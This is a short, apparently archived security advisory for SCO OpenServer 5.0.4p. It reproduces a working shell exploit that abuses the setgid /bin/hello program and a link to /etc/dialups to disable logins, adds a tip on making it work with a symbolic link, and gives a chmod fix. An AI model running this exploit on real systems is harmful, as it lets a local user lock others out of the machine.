COMMAND

    tty

SYSTEMS AFFECTED

    SCO 5.0.4p

PROBLEM

    Leshka posed  following.   It's a  script for  login disabling  or
    enabling.  Here's it goes

    #!/bin/sh
    #
    #                                   Hi !
    #             This script is used for login disabling(enabling)
    #                (SCO OpenServer Enterprise System v 5.0.4p).
    #            If you have any problems with it, drop me a letter.
    #                                Have fun !
    #
    #
    #                           ----------------------
    #               ---------------------------------------------
    #    -----------------   Dedicated to my beautiful lady   ------------------
    #               ---------------------------------------------
    #                           ----------------------
    #
    #          Leshka Zakharoff, 1998. E-mail: leshka@leshka.chuvashia.su
    #
    #
    #999,99
    tty=`tty`;ttyfile=`pwd`/`basename $tty`
    echo "Press any letter key 240 times (3 lines of text) then <CTRL>-D to disable"
    echo "login or just type <CTRL>-D to login enable. Sorry for the manual work."
    ln /etc/dialups $ttyfile;hello leshka ..$ttyfile;rm -f $ttyfile

    The exploit fails if  your CWD is not  in the same file  system as
    /etc.  Using a symbolic rather than a hard link fixes that.

SOLUTION

    The exploit can be defeated with:

        # chmod g-s /bin/hello